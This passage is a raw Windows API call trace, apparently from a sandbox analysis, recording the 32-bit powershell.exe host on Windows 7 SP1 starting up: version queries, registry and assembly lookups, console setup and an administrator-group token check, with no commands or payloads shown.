puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29be198, puLen=0x2ced50) returned 1 [0050.152] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0050.152] lstrcpyW (in: lpString1=0x3b8428, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0050.152] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29be214, puLen=0x2ced50) returned 1 [0050.152] lstrlenW (lpString="6.1.7601.17514") returned 14 [0050.152] lstrcpyW (in: lpString1=0x3b8428, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0050.153] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x29bdebc, puLen=0x2ced50) returned 1 [0050.153] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0050.153] lstrcpyW (in: lpString1=0x3b8428, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0050.153] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x0, puLen=0x2ced50) returned 0 [0050.153] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x0, puLen=0x2ced50) returned 0 [0050.153] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x2ced54, puLen=0x2ced50 | out: lplpBuffer=0x2ced54*=0x0, puLen=0x2ced50) returned 0 [0050.153] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2ced48, puLen=0x2ced44 | out: lplpBuffer=0x2ced48*=0x29bde64, puLen=0x2ced44) returned 1 [0050.153] VerLanguageNameW (in: wLang=0x0, szLang=0x3b8428, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0050.153] VerQueryValueW (in: pBlock=0x29bddc8, lpSubBlock="\\", lplpBuffer=0x2ced5c, puLen=0x2ced58 | out: lplpBuffer=0x2ced5c*=0x29bddf0, puLen=0x2ced58) returned 1 [0050.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.159] GetLastError () returned 0xcb [0050.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.165] GetLastError () returned 0xcb [0050.169] lstrlenW (lpString="䅁") returned 1 [0050.172] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ced20 | out: phkResult=0x2ced20*=0x31c) returned 0x0 [0050.172] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ced24 | out: phkResult=0x2ced24*=0x320) returned 0x0 [0050.172] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ced58 | out: phkResult=0x2ced58*=0x324) returned 0x0 [0050.174] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ced98, lpData=0x0, lpcbData=0x2ced94*=0x0 | out: lpType=0x2ced98*=0x1, lpData=0x0, lpcbData=0x2ced94*=0x56) returned 0x0 [0050.176] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ced98, lpData=0x3b8428, lpcbData=0x2ced94*=0x56 | out: lpType=0x2ced98*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ced94*=0x56) returned 0x0 [0050.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.179] GetLastError () returned 0x0 [0050.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.180] GetLastError () returned 0x0 [0050.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.186] GetLastError () returned 0x0 [0050.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.200] GetLastError () returned 0xcb [0050.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0050.439] GetLastError () returned 0x2 [0050.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0050.439] GetLastError () returned 0x2 [0050.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.544] GetLastError () returned 0xcb [0050.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.545] GetLastError () returned 0xcb [0050.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.575] GetLastError () returned 0xcb [0050.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.576] GetLastError () returned 0xcb [0050.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.576] GetLastError () returned 0xcb [0050.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.720] GetLastError () returned 0x0 [0050.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.720] GetLastError () returned 0x0 [0050.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.739] GetLastError () returned 0xcb [0050.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.742] GetLastError () returned 0xcb [0050.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.789] GetLastError () returned 0x7e [0050.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.789] GetLastError () returned 0x7e [0051.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0051.257] GetLastError () returned 0x2 [0051.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0051.257] GetLastError () returned 0x2 [0051.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.328] GetLastError () returned 0x57 [0051.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.328] GetLastError () returned 0x57 [0051.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0051.456] GetLastError () returned 0x2 [0051.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0051.456] GetLastError () returned 0x2 [0051.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0051.544] GetLastError () returned 0x2 [0051.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0051.544] GetLastError () returned 0x2 [0051.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.566] GetLastError () returned 0xcb [0051.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.566] GetLastError () returned 0xcb [0051.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.566] GetLastError () returned 0xcb [0051.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.571] GetLastError () returned 0xcb [0051.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x2ce86c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0051.617] GetLastError () returned 0x2 [0051.617] SetErrorMode (uMode=0x1) returned 0x1 [0051.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x2ced14 | out: lpFileInformation=0x2ced14*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.617] GetLastError () returned 0x2 [0051.617] SetErrorMode (uMode=0x1) returned 0x1 [0051.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.757] GetLastError () returned 0x0 [0051.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.757] GetLastError () returned 0x0 [0051.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.758] GetLastError () returned 0x0 [0051.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.760] GetLastError () returned 0xcb [0051.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.767] GetLastError () returned 0xcb [0051.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.767] GetLastError () returned 0xcb [0051.814] CoCreateGuid (in: pguid=0x2cedf4 | out: pguid=0x2cedf4*(Data1=0x2b8da106, Data2=0x538, Data3=0x498e, Data4=([0]=0xad, [1]=0xdf, [2]=0x4f, [3]=0x63, [4]=0x9, [5]=0xd9, [6]=0x48, [7]=0xf3))) returned 0x0 [0051.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.838] GetLastError () returned 0xcb [0051.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.840] GetLastError () returned 0xcb [0051.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.842] GetLastError () returned 0xcb [0051.851] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0051.851] GetLastError () returned 0x0 [0051.853] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x2cecd4 | out: lpConsoleScreenBufferInfo=0x2cecd4) returned 1 [0051.853] GetLastError () returned 0x0 [0051.857] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0051.857] GetLastError () returned 0x0 [0051.857] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x2cecd4 | out: lpConsoleScreenBufferInfo=0x2cecd4) returned 1 [0051.857] GetLastError () returned 0x0 [0051.858] GetVersionExW (in: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.858] GetLastError () returned 0x0 [0051.859] GetCurrentProcess () returned 0xffffffff [0051.859] GetLastError () returned 0x3f0 [0051.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2cece4 | out: TokenHandle=0x2cece4*=0x340) returned 1 [0051.860] GetLastError () returned 0x3f0 [0051.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2ced3c | out: TokenInformation=0x0, ReturnLength=0x2ced3c) returned 0 [0051.862] GetLastError () returned 0x7a [0051.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x374870, TokenInformationLength=0x4, ReturnLength=0x2ced3c | out: TokenInformation=0x374870, ReturnLength=0x2ced3c) returned 1 [0051.863] GetLastError () returned 0x7a [0051.864] DuplicateTokenEx (in: hExistingToken=0x340, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x2cecf4 | out: phNewToken=0x2cecf4*=0x338) returned 1 [0051.864] GetLastError () returned 0x7f [0051.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2ced3c | out: TokenInformation=0x0, ReturnLength=0x2ced3c) returned 0 [0051.864] GetLastError () returned 0x7a [0051.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x374820, TokenInformationLength=0x4, ReturnLength=0x2ced3c | out: TokenInformation=0x374820, ReturnLength=0x2ced3c) returned 1 [0051.864] GetLastError () returned 0x7a [0051.864] CheckTokenMembership (in: TokenHandle=0x338, SidToCheck=0x2a40c3c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x2cecd0 | out: IsMember=0x2cecd0) returned 1 [0051.864] GetLastError () returned 0x7a [0051.864] CloseHandle (hObject=0x338) returned 1 [0051.864] GetLastError () returned 0x7a [0051.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.865] GetLastError () returned 0x7a [0051.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.865] GetLastError () returned 0x7a [0051.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.865] GetLastError () returned 0x7a [0051.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.865] GetLastError () returned 0x7a [0051.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.918] GetLastError () returned 0x7a [0051.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.918] GetLastError () returned 0x7a [0051.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.918] GetLastError () returned 0x7a [0051.926] GetConsoleTitleW (in: lpConsoleTitle=0x3b29f8, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0051.926] GetLastError () returned 0x7a [0051.947] GetConsoleTitleW (in: lpConsoleTitle=0x3b29f8, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0051.947] GetLastError () returned 0x7a [0051.947] GetFullPathNameW (in: 